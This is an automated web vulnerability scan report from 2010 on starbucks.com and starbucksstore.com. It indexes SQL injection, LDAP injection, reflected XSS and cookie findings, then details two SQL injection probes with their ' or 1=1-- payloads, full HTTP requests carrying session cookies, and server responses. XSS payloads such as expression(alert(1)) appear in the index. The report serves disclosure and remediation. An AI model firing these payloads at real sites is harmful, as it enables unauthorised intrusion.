/head> Report generated by XSS.CX at Wed Nov 17 06:58:46 CST 2010.


Cross Site Scripting Reports | Hoyt LLC Research

Loading

1. SQL injection

1.1. http://www.starbucks.com/coffee/starbucks-reserve-coffee [name of an arbitrarily supplied request parameter]

1.2. http://www.starbucks.com/coffee/via/instant-coffee [name of an arbitrarily supplied request parameter]

1.3. http://www.starbucks.com/menu [name of an arbitrarily supplied request parameter]

1.4. http://www.starbucks.com/responsibility [__utmc cookie]

1.5. http://www.starbucks.com/responsibility/community/starbucks-foundation [__utmc cookie]

1.6. http://www.starbucksstore.com/aff/adredir.asp [SITESERVER cookie]

1.7. http://www.starbucksstore.com/guestassist/shcontus.asp [ASPSESSIONIDACABBACA cookie]

2. LDAP injection

2.1. http://www.starbucksstore.com/ [ASPSESSIONIDACABBACA cookie]

2.2. http://www.starbucksstore.com/aff/adredir.asp [ASPSESSIONIDACABBACA cookie]

2.3. http://www.starbucksstore.com/coffee-machines/ [ASPSESSIONIDCCDDADAA cookie]

2.4. http://www.starbucksstore.com/guestassist/shgaform.asp [EMail.x parameter]

3. Cross-site scripting (reflected)

3.1. http://www.starbucks.com/ [8af12"style%3d"x%3aexpression(alert(1))"9f35c014f5e parameter]

3.2. http://www.starbucks.com/ [8af12%22style%3d%22x%3aexpression(alert(1))%229f35c014f5e parameter]

3.3. http://www.starbucks.com/ [8af12%22style%3d%22x:expression(alert(1))%229f35c014f5e parameter]

3.4. http://www.starbucks.com/ [name of an arbitrarily supplied request parameter]

3.5. http://www.starbucks.com/about-us [name of an arbitrarily supplied request parameter]

3.6. http://www.starbucks.com/coffee [name of an arbitrarily supplied request parameter]

3.7. http://www.starbucks.com/coffee/learn [name of an arbitrarily supplied request parameter]

3.8. http://www.starbucks.com/coffee/learn/clover [name of an arbitrarily supplied request parameter]

3.9. http://www.starbucks.com/coffee/learn/flavors-in-your-cup [name of an arbitrarily supplied request parameter]

3.10. http://www.starbucks.com/coffee/starbucks-natural-fusions [name of an arbitrarily supplied request parameter]

3.11. http://www.starbucks.com/coffee/starbucks-natural-fusions/caramel [name of an arbitrarily supplied request parameter]

3.12. http://www.starbucks.com/coffee/starbucks-natural-fusions/cinnamon [name of an arbitrarily supplied request parameter]

3.13. http://www.starbucks.com/coffee/starbucks-natural-fusions/savoring [name of an arbitrarily supplied request parameter]

3.14. http://www.starbucks.com/coffee/starbucks-natural-fusions/vanilla [name of an arbitrarily supplied request parameter]

3.15. http://www.starbucks.com/coffee/starbucks-reserve-coffee [name of an arbitrarily supplied request parameter]

3.16. http://www.starbucks.com/coffee/starbucks-reserve-coffee/aged-sulawesi-kalosi [name of an arbitrarily supplied request parameter]

3.17. http://www.starbucks.com/coffee/starbucks-reserve-coffee/brazil-sul-de-minas-peaberry [name of an arbitrarily supplied request parameter]

3.18. http://www.starbucks.com/coffee/starbucks-reserve-coffee/el-salvador-montecarlos-estate-pacamara [name of an arbitrarily supplied request parameter]

3.19. http://www.starbucks.com/coffee/starbucks-reserve-coffee/nicaragua-corcasan [name of an arbitrarily supplied request parameter]

3.20. http://www.starbucks.com/coffee/via [name of an arbitrarily supplied request parameter]

3.21. http://www.starbucks.com/coffee/via/flavored-coffee [name of an arbitrarily supplied request parameter]

3.22. http://www.starbucks.com/coffee/via/instant-coffee [name of an arbitrarily supplied request parameter]

3.23. http://www.starbucks.com/coffee/whole-bean-coffee [name of an arbitrarily supplied request parameter]

3.24. http://www.starbucks.com/coffee/whole-bean-coffee/africa-arabia [name of an arbitrarily supplied request parameter]

3.25. http://www.starbucks.com/coffee/whole-bean-coffee/asia-pacific [name of an arbitrarily supplied request parameter]

3.26. http://www.starbucks.com/coffee/whole-bean-coffee/dark-and-specialty-roast [name of an arbitrarily supplied request parameter]

3.27. http://www.starbucks.com/coffee/whole-bean-coffee/latin-america [name of an arbitrarily supplied request parameter]

3.28. http://www.starbucks.com/coffee/whole-bean-coffee/multi-region-blends [name of an arbitrarily supplied request parameter]

3.29. http://www.starbucks.com/coffee/whole-bean-coffee/multi-region-blends/starbucks-christmas-blend [name of an arbitrarily supplied request parameter]

3.30. http://www.starbucks.com/coffeehouse [name of an arbitrarily supplied request parameter]

3.31. http://www.starbucks.com/coffeehouse/community [name of an arbitrarily supplied request parameter]

3.32. http://www.starbucks.com/coffeehouse/community/mystarbucksidea [name of an arbitrarily supplied request parameter]

3.33. http://www.starbucks.com/coffeehouse/entertainment [name of an arbitrarily supplied request parameter]

3.34. http://www.starbucks.com/coffeehouse/mobile-apps [name of an arbitrarily supplied request parameter]

3.35. http://www.starbucks.com/coffeehouse/mobile-apps/mystarbucks [name of an arbitrarily supplied request parameter]

3.36. http://www.starbucks.com/coffeehouse/mobile-apps/starbucks-card-mobile [name of an arbitrarily supplied request parameter]

3.37. http://www.starbucks.com/coffeehouse/mobile-apps/starbucks-card-mobile-bb [name of an arbitrarily supplied request parameter]

3.38. http://www.starbucks.com/coffeehouse/store-design [name of an arbitrarily supplied request parameter]

3.39. http://www.starbucks.com/coffeehouse/wireless-internet [name of an arbitrarily supplied request parameter]

3.40. http://www.starbucks.com/coffeehouse/wireless-internet/in-canada [name of an arbitrarily supplied request parameter]

3.41. http://www.starbucks.com/coffeehouse/wireless-internet/starbucks-digital-network [name of an arbitrarily supplied request parameter]

3.42. http://www.starbucks.com/customer-service/contact [name of an arbitrarily supplied request parameter]

3.43. http://www.starbucks.com/customer-service/faqs/card [name of an arbitrarily supplied request parameter]

3.44. http://www.starbucks.com/customer-service/faqs/coffee [name of an arbitrarily supplied request parameter]

3.45. http://www.starbucks.com/customer-service/faqs/coffeehouse [name of an arbitrarily supplied request parameter]

3.46. http://www.starbucks.com/customer-service/faqs/menu [name of an arbitrarily supplied request parameter]

3.47. http://www.starbucks.com/customer-service/faqs/responsibility [name of an arbitrarily supplied request parameter]

3.48. http://www.starbucks.com/customer-service/faqs/shop [name of an arbitrarily supplied request parameter]

3.49. http://www.starbucks.com/menu [name of an arbitrarily supplied request parameter]

3.50. http://www.starbucks.com/menu/drinks [name of an arbitrarily supplied request parameter]

3.51. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages [name of an arbitrarily supplied request parameter]

3.52. http://www.starbucks.com/menu/food [name of an arbitrarily supplied request parameter]

3.53. http://www.starbucks.com/menu/food/bakery/cranberry-bliss-bar [name of an arbitrarily supplied request parameter]

3.54. http://www.starbucks.com/menu/nutrition [name of an arbitrarily supplied request parameter]

3.55. http://www.starbucks.com/menu/nutrition/20-under-200 [name of an arbitrarily supplied request parameter]

3.56. http://www.starbucks.com/menu/nutrition/20-under-200 [name of an arbitrarily supplied request parameter]

3.57. http://www.starbucks.com/menu/nutrition/35-under-350 [name of an arbitrarily supplied request parameter]

3.58. http://www.starbucks.com/responsibility [name of an arbitrarily supplied request parameter]

3.59. http://www.starbucks.com/responsibility/community [name of an arbitrarily supplied request parameter]

3.60. http://www.starbucks.com/responsibility/community/community-service [name of an arbitrarily supplied request parameter]

3.61. http://www.starbucks.com/responsibility/community/starbucks-foundation [name of an arbitrarily supplied request parameter]

3.62. http://www.starbucks.com/responsibility/community/starbucks-red [name of an arbitrarily supplied request parameter]

3.63. http://www.starbucks.com/responsibility/community/youth-action [name of an arbitrarily supplied request parameter]

3.64. http://www.starbucks.com/search [61fd7"style%3d"x%3aexpression(alert(1))"61073b145fc parameter]

3.65. http://www.starbucks.com/search [keywords parameter]

3.66. http://www.starbucks.com/search [name of an arbitrarily supplied request parameter]

3.67. http://www.starbucks.com/site-map [name of an arbitrarily supplied request parameter]

3.68. http://www.starbucks.com/store-locator [name of an arbitrarily supplied request parameter]

3.69. http://www.starbucks.com/whats-new [name of an arbitrarily supplied request parameter]

3.70. http://www.starbucksstore.com/ [CookingAd cookie]

3.71. http://www.starbucksstore.com/GuestAssist/poweredbycooking.asp [CookingAd cookie]

3.72. http://www.starbucksstore.com/StarbucksCard/default.asp [CookingAd cookie]

3.73. http://www.starbucksstore.com/Tours/ [CookingAd cookie]

3.74. http://www.starbucksstore.com/aff/adredir.asp [CookingAd cookie]

3.75. http://www.starbucksstore.com/coffee [CookingAd cookie]

3.76. http://www.starbucksstore.com/coffee-machines [CookingAd cookie]

3.77. http://www.starbucksstore.com/coffee-machines/ [CookingAd cookie]

3.78. http://www.starbucksstore.com/default.asp [CookingAd cookie]

3.79. http://www.starbucksstore.com/entertainment [CookingAd cookie]

3.80. http://www.starbucksstore.com/entertainment/ [CookingAd cookie]

3.81. http://www.starbucksstore.com/extras/newsletters.asp [CookingAd cookie]

3.82. http://www.starbucksstore.com/guestassist/ga_faq_shipop.asp [CookingAd cookie]

3.83. http://www.starbucksstore.com/guestassist/gareturns.asp [CookingAd cookie]

3.84. http://www.starbucksstore.com/guestassist/shcontus.asp [CookingAd cookie]

3.85. http://www.starbucksstore.com/guestassist/shgaemailconfirm.asp [CookingAd cookie]

3.86. http://www.starbucksstore.com/guestassist/shgaform.asp [CookingAd cookie]

3.87. http://www.starbucksstore.com/mya/links.asp [CookingAd cookie]

3.88. http://www.starbucksstore.com/mya/track.asp [CookingAd cookie]

3.89. http://www.starbucksstore.com/products/include/SearchNav.asp [CookingAd cookie]

3.90. http://www.starbucksstore.com/products/shabotus.asp [CookingAd cookie]

3.91. http://www.starbucksstore.com/products/shourplg.asp [CookingAd cookie]

3.92. http://www.starbucksstore.com/products/shprodde.asp [CookingAd cookie]

3.93. http://www.starbucksstore.com/products/shprodde.asp [CookingAd cookie]

3.94. http://www.starbucksstore.com/products/shprodli.asp [CookingAd cookie]

3.95. http://www.starbucksstore.com/products/sitemap.asp [CookingAd cookie]

3.96. http://www.starbucksstore.com/products/terms.asp [CookingAd cookie]

3.97. http://www.starbucksstore.com/small-office-coffee [CookingAd cookie]

3.98. http://www.starbucksstore.com/starbucks-coffee-delivery [CookingAd cookie]

3.99. http://www.starbucksstore.com/starbucks-coffee-delivery/ [CookingAd cookie]

3.100. http://www.starbucksstore.com/starbucks-coffee-tours/ [CookingAd cookie]

3.101. http://www.starbucksstore.com/starbucks-gift-cards [CookingAd cookie]

3.102. http://www.starbucksstore.com/starbucks-gifts [CookingAd cookie]

3.103. http://www.starbucksstore.com/starbucks-gifts/ [CookingAd cookie]

3.104. http://www.starbucksstore.com/starbucks-reserve [CookingAd cookie]

3.105. http://www.starbucksstore.com/starbucks-seasonal [CookingAd cookie]

3.106. http://www.starbucksstore.com/starbucks-seasonal/starbucks-seasonal.asp [CookingAd cookie]

3.107. http://www.starbucksstore.com/starbucks-via [CookingAd cookie]

3.108. http://www.starbucksstore.com/tea [CookingAd cookie]

4. Session token in URL

4.1. http://www.starbucks.com/about-us

4.2. http://www.starbucks.com/site-map

5. Open redirection

6. Cookie without HttpOnly flag set

6.1. http://www.starbucksstore.com/

6.2. http://www.starbucksstore.com/GuestAssist/poweredbycooking.asp

6.3. http://www.starbucksstore.com/aff/adredir.asp

6.4. http://www.starbucksstore.com/aff/adredir.asp

6.5. http://www.starbucksstore.com/guestassist/shcontus.asp

6.6. http://www.starbucksstore.com/guestassist/shcontus.asp

6.7. http://www.starbucksstore.com/guestassist/shgaemailconfirm.asp

6.8. http://www.starbucksstore.com/guestassist/shgaform.asp

6.9. http://www.starbucksstore.com/guestassist/shgaform.asp

6.10. http://www.starbucksstore.com/coffee-machines/

6.11. http://www.starbucksstore.com/default.asp

7. Password field with autocomplete enabled

7.1. http://www.starbucks.com/blog/610/check-in-at-starbucks

7.2. http://www.starbucks.com/blog/611/my-starbucks-idea-s-100-000th-idea

7.3. http://www.starbucks.com/blog/612/good-books-on-the-starbucks-digital-network

7.4. http://www.starbucks.com/blog/615/i-m-dreaming-of-cranberry-bliss-bar

7.5. http://www.starbucks.com/blog/616/thanksgiving-blend-fit-for-a-feast

8. Source code disclosure

9. Cross-domain Referer leakage

9.1. http://www.starbucks.com/

9.2. http://www.starbucks.com/

9.3. http://www.starbucks.com/

9.4. http://www.starbucks.com/search

9.5. http://www.starbucks.com/search

9.6. http://www.starbucks.com/search

9.7. http://www.starbucksstore.com/

9.8. http://www.starbucksstore.com/coffee-machines/

9.9. http://www.starbucksstore.com/default.asp

9.10. http://www.starbucksstore.com/guestassist/shcontus.asp

9.11. http://www.starbucksstore.com/products/shprodde.asp

9.12. http://www.starbucksstore.com/products/shprodli.asp

10. Cross-domain script include

10.1. http://www.starbucks.com/

10.2. http://www.starbucks.com/about-us

10.3. http://www.starbucks.com/blog/610/check-in-at-starbucks

10.4. http://www.starbucks.com/blog/611/my-starbucks-idea-s-100-000th-idea

10.5. http://www.starbucks.com/blog/612/good-books-on-the-starbucks-digital-network

10.6. http://www.starbucks.com/blog/615/i-m-dreaming-of-cranberry-bliss-bar

10.7. http://www.starbucks.com/blog/616/thanksgiving-blend-fit-for-a-feast

10.8. http://www.starbucks.com/coffee

10.9. http://www.starbucks.com/coffee/learn

10.10. http://www.starbucks.com/coffee/learn/clover

10.11. http://www.starbucks.com/coffee/learn/flavors-in-your-cup

10.12. http://www.starbucks.com/coffee/starbucks-natural-fusions

10.13. http://www.starbucks.com/coffee/starbucks-natural-fusions/caramel

10.14. http://www.starbucks.com/coffee/starbucks-natural-fusions/cinnamon

10.15. http://www.starbucks.com/coffee/starbucks-natural-fusions/savoring

10.16. http://www.starbucks.com/coffee/starbucks-natural-fusions/vanilla

10.17. http://www.starbucks.com/coffee/starbucks-reserve-coffee

10.18. http://www.starbucks.com/coffee/starbucks-reserve-coffee/aged-sulawesi-kalosi

10.19. http://www.starbucks.com/coffee/starbucks-reserve-coffee/brazil-sul-de-minas-peaberry

10.20. http://www.starbucks.com/coffee/starbucks-reserve-coffee/el-salvador-montecarlos-estate-pacamara

10.21. http://www.starbucks.com/coffee/starbucks-reserve-coffee/nicaragua-corcasan

10.22. http://www.starbucks.com/coffee/via

10.23. http://www.starbucks.com/coffee/via/flavored-coffee

10.24. http://www.starbucks.com/coffee/via/instant-coffee

10.25. http://www.starbucks.com/coffee/whole-bean-coffee

10.26. http://www.starbucks.com/coffee/whole-bean-coffee/africa-arabia

10.27. http://www.starbucks.com/coffee/whole-bean-coffee/dark-and-specialty-roast

10.28. http://www.starbucks.com/coffee/whole-bean-coffee/latin-america

10.29. http://www.starbucks.com/coffee/whole-bean-coffee/multi-region-blends

10.30. http://www.starbucks.com/coffee/whole-bean-coffee/multi-region-blends/starbucks-christmas-blend

10.31. http://www.starbucks.com/coffeehouse

10.32. http://www.starbucks.com/coffeehouse/community

10.33. http://www.starbucks.com/coffeehouse/community/mystarbucksidea

10.34. http://www.starbucks.com/coffeehouse/entertainment

10.35. http://www.starbucks.com/coffeehouse/mobile-apps

10.36. http://www.starbucks.com/coffeehouse/mobile-apps/mystarbucks

10.37. http://www.starbucks.com/coffeehouse/mobile-apps/starbucks-card-mobile

10.38. http://www.starbucks.com/coffeehouse/mobile-apps/starbucks-card-mobile-bb

10.39. http://www.starbucks.com/coffeehouse/wireless-internet

10.40. http://www.starbucks.com/coffeehouse/wireless-internet/in-canada

10.41. http://www.starbucks.com/coffeehouse/wireless-internet/starbucks-digital-network

10.42. http://www.starbucks.com/customer-service/contact

10.43. http://www.starbucks.com/customer-service/faqs/coffee

10.44. http://www.starbucks.com/customer-service/faqs/coffeehouse

10.45. http://www.starbucks.com/customer-service/faqs/menu

10.46. http://www.starbucks.com/customer-service/faqs/responsibility

10.47. http://www.starbucks.com/customer-service/faqs/shop

10.48. http://www.starbucks.com/menu

10.49. http://www.starbucks.com/menu/drinks

10.50. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages

10.51. http://www.starbucks.com/menu/food

10.52. http://www.starbucks.com/menu/food/bakery/cranberry-bliss-bar

10.53. http://www.starbucks.com/menu/nutrition

10.54. http://www.starbucks.com/menu/nutrition/20-under-200

10.55. http://www.starbucks.com/menu/nutrition/35-under-350

10.56. http://www.starbucks.com/responsibility

10.57. http://www.starbucks.com/responsibility/community

10.58. http://www.starbucks.com/responsibility/community/community-service

10.59. http://www.starbucks.com/responsibility/community/starbucks-foundation

10.60. http://www.starbucks.com/responsibility/community/starbucks-red

10.61. http://www.starbucks.com/responsibility/community/youth-action

10.62. http://www.starbucks.com/search

10.63. http://www.starbucks.com/share

10.64. http://www.starbucks.com/share/

10.65. http://www.starbucks.com/site-map

10.66. http://www.starbucks.com/store-locator

10.67. http://www.starbucks.com/whats-new

10.68. http://www.starbucksstore.com/

10.69. http://www.starbucksstore.com/GuestAssist/poweredbycooking.asp

10.70. http://www.starbucksstore.com/StarbucksCard/default.asp

10.71. http://www.starbucksstore.com/coffee-machines/

10.72. http://www.starbucksstore.com/default.asp

10.73. http://www.starbucksstore.com/entertainment/

10.74. http://www.starbucksstore.com/extras/newsletters.asp

10.75. http://www.starbucksstore.com/guestassist/ga_faq_shipop.asp

10.76. http://www.starbucksstore.com/guestassist/gareturns.asp

10.77. http://www.starbucksstore.com/guestassist/shcontus.asp

10.78. http://www.starbucksstore.com/guestassist/shgaemailconfirm.asp

10.79. http://www.starbucksstore.com/guestassist/shgaform.asp

10.80. http://www.starbucksstore.com/mya/links.asp

10.81. http://www.starbucksstore.com/mya/track.asp

10.82. http://www.starbucksstore.com/products/shabotus.asp

10.83. http://www.starbucksstore.com/products/shourplg.asp

10.84. http://www.starbucksstore.com/products/shprodde.asp

10.85. http://www.starbucksstore.com/products/shprodli.asp

10.86. http://www.starbucksstore.com/products/sitemap.asp

10.87. http://www.starbucksstore.com/products/terms.asp

10.88. http://www.starbucksstore.com/starbucks-coffee-delivery/

10.89. http://www.starbucksstore.com/starbucks-coffee-tours/

10.90. http://www.starbucksstore.com/starbucks-gifts/

10.91. http://www.starbucksstore.com/starbucks-seasonal/starbucks-seasonal.asp

11. Email addresses disclosed

11.1. http://www.starbucks.com/customer-service/faqs/coffeehouse

11.2. http://www.starbucks.com/customer-service/faqs/shop

11.3. http://www.starbucks.com/static/js/global.js

11.4. http://www.starbucksstore.com/guestassist/guestassist_jscript.js

12. Private IP addresses disclosed

12.1. http://www.starbucksstore.com/

12.2. http://www.starbucksstore.com/GuestAssist/poweredbycooking.asp

12.3. http://www.starbucksstore.com/GuestAssist/poweredbycooking.asp

12.4. http://www.starbucksstore.com/StarbucksCard/default.asp

12.5. http://www.starbucksstore.com/coffee-machines/

12.6. http://www.starbucksstore.com/default.asp

12.7. http://www.starbucksstore.com/entertainment/

12.8. http://www.starbucksstore.com/extras/newsletters.asp

12.9. http://www.starbucksstore.com/guestassist/ga_faq_shipop.asp

12.10. http://www.starbucksstore.com/guestassist/gareturns.asp

12.11. http://www.starbucksstore.com/guestassist/shcontus.asp

12.12. http://www.starbucksstore.com/guestassist/shcontus.asp

12.13. http://www.starbucksstore.com/guestassist/shcontus.asp

12.14. http://www.starbucksstore.com/guestassist/shgaemailconfirm.asp

12.15. http://www.starbucksstore.com/guestassist/shgaform.asp

12.16. http://www.starbucksstore.com/mya/links.asp

12.17. http://www.starbucksstore.com/mya/track.asp

12.18. http://www.starbucksstore.com/products/shabotus.asp

12.19. http://www.starbucksstore.com/products/shourplg.asp

12.20. http://www.starbucksstore.com/products/shprodde.asp

12.21. http://www.starbucksstore.com/products/shprodli.asp

12.22. http://www.starbucksstore.com/products/sitemap.asp

12.23. http://www.starbucksstore.com/products/terms.asp

12.24. http://www.starbucksstore.com/starbucks-coffee-delivery/

12.25. http://www.starbucksstore.com/starbucks-coffee-tours/

12.26. http://www.starbucksstore.com/starbucks-gifts/

12.27. http://www.starbucksstore.com/starbucks-seasonal/starbucks-seasonal.asp

13. HTML does not specify charset

14. Content type incorrectly stated



1. SQL injection  next
There are 7 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://www.starbucks.com/coffee/starbucks-reserve-coffee [name of an arbitrarily supplied request parameter]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.starbucks.com
Path:   /coffee/starbucks-reserve-coffee

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 62476475'%20or%201%3d1--%20 and 62476475'%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /coffee/starbucks-reserve-coffee?162476475'%20or%201%3d1--%20=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response 1

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:57:35 GMT
Connection: close
Content-Length: 52660

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<a href="/coffee/starbucks-reserve-coffee/aged-sulawesi-kalosi" title="Aged Sulawesi Kalosi">
                   <img src="http://assets.starbucks.com/assets/aa98bb468e8e4d11bcf9c7c5c337e4fd.jpg" alt="Aged Sulawesi Kalosi Stamp Art" />
                   <br /><strong><span>Aged Sulawesi Kalosi</span></strong>
                   <br /><span class="family">Starbucks Reserve... Coffee </span>
                   <br /><span class="intensity"></span>
               </a>
           </li>
           
           <li class="specialty_roast">
               <a href="/coffee/starbucks-reserve-coffee/brazil-sul-de-minas-peaberry" title="Brazil Sul de Minas Peaberry">
                   <img src="http://assets.starbucks.com/assets/84a1915283354bf5af4293a62a6b3175.jpg" alt="Brazil Sul de Minas Peaberry Stamp Art" />
                   <br /><strong><span>Brazil Sul de Minas Peaberry</span></strong>
                   <br /><span class="family">Starbucks Reserve... Coffee </span>
                   <br /><span class="intensity"></span>
               </a>
           </li>
           
           <li class="specialty_roast">
               <a href="/coffee/starbucks-reserve-coffee/nicaragua-corcasan" title="Nicaragua Corcasan">
                   <img src="http://assets.starbucks.com/assets/a96b1ae27bf54ad18badf356775bc1d0.jpg" alt="Nicaragua Corcasan Stamp Art" />
                   <br /><strong><span>Nicaragua Corcasan</span></strong>
                   <br /><span class="family">Starbucks Reserve... Coffee </span>
                   <br /><span class="intensity"></span>
               </a>
           </li>
           
           <li class="specialty_roast">
               <a href="/coffee/starbucks-reserve-coffee/el-salvador-montecarlos-estate-pacamara" title="El Salvador Montecarlos Estate Pacamara">
                   <img src="http://assets.starbucks.com/assets/6099ccd747624971ba8c782bb0f8fe45.jpg" alt="El Salvador Pacamara Montecarlos Estate Catalog Image" />
                   <br /><strong><span>El Salvador Montecarlos Estate Pacamara</span></strong>
                   <br /><span class="family">Starbucks Reserve... Coffee </span>
                   <br /><span class="intensity"></span>
               </a>
           </li>
           
           <li class="specialty_roast">
               <a href="/coffee/starbucks-reserve-coffee/galapagos
...[SNIP]...

Request 2

GET /coffee/starbucks-reserve-coffee?162476475'%20or%201%3d2--%20=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response 2

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:57:38 GMT
Connection: close
Content-Length: 51704

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<a href="/coffee/starbucks-reserve-coffee/nicaragua-corcasan" title="Nicaragua Corcasan">
                   <img src="http://assets.starbucks.com/assets/a96b1ae27bf54ad18badf356775bc1d0.jpg" alt="Nicaragua Corcasan Stamp Art" />
                   <br /><strong><span>Nicaragua Corcasan</span></strong>
                   <br /><span class="family">Starbucks Reserve... Coffee </span>
                   <br /><span class="intensity"></span>
               </a>
           </li>
           
           <li class="specialty_roast">
               <a href="/coffee/starbucks-reserve-coffee/el-salvador-montecarlos-estate-pacamara" title="El Salvador Montecarlos Estate Pacamara">
                   <img src="http://assets.starbucks.com/assets/6099ccd747624971ba8c782bb0f8fe45.jpg" alt="El Salvador Pacamara Montecarlos Estate Catalog Image" />
                   <br /><strong><span>El Salvador Montecarlos Estate Pacamara</span></strong>
                   <br /><span class="family">Starbucks Reserve... Coffee </span>
                   <br /><span class="intensity"></span>
               </a>
           </li>
           
           <li class="specialty_roast">
               <a href="/coffee/starbucks-reserve-coffee/galapagos-san-cristobal" title="Gal..pagos San Crist..bal">
                   <img src="http://assets.starbucks.com/assets/4d25963349584f26a7d3f9ac787313e9.jpg" alt="Galapagos San Cristobal" />
                   <br /><strong><span>Gal..pagos San Crist..bal</span></strong>
                   <br /><span class="family">Starbucks Reserve... Coffee </span>
                   <br /><span class="intensity"></span>
               </a>
           </li>
           
       </ol>
   </div>


   <div class="section" id="posts">


<div id="blog-603" class="blog-entry">
<h2><a href="/blog/The-New-Starbucks-Reservee284a2-Coffees">The New Starbucks Reserve... Coffees</a></h2>
<ul class="heading">
<li class="byline">
           <p class="postdate">October 05, 2010</p>
<p>Posted by Jason S., coffee engagement manager</p>
</li>
<li class="comment-num"><a href="/blog/the-new-starbucks-reservee284a2-coffees#blog-comments"><span class="comment-count">0</span> Comments</a></li>
</ul>

...[SNIP]...

1.2. http://www.starbucks.com/coffee/via/instant-coffee [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.starbucks.com
Path:   /coffee/via/instant-coffee

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 13312046'%20or%201%3d1--%20 and 13312046'%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /coffee/via/instant-coffee?113312046'%20or%201%3d1--%20=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response 1

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:57:02 GMT
Connection: close
Content-Length: 53520

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<a href="/coffee/via/instant-coffee/christmas-blend" title="Christmas Blend">
                           <img src="http://assets.starbucks.com/assets/e9a91915e04244bf99f8a97ed289c558.jpg" alt="Starbucks VIA.. Christmas Blend" />
                           <br /><strong><span>Christmas Blend</span></strong>
                           <br /><span class="family">Starbucks VIA.. Coffees</span>
                           <br /><span class="intensity"></span>
                       </a>
                   </li>
                   
                   <li class="specialty_roast">
                       <a href="/coffee/via/instant-coffee/colombia" title="Colombia">
                           <img src="http://assets.starbucks.com/assets/b5deaf4ecf7d425e822f907973cb950f.png" alt="Starbucks VIA.. Colombia" />
                           <br /><strong><span>Colombia</span></strong>
                           <br /><span class="family">Starbucks VIA.. Coffees</span>
                           <br /><span class="intensity">Medium</span>
                       </a>
                   </li>
                   
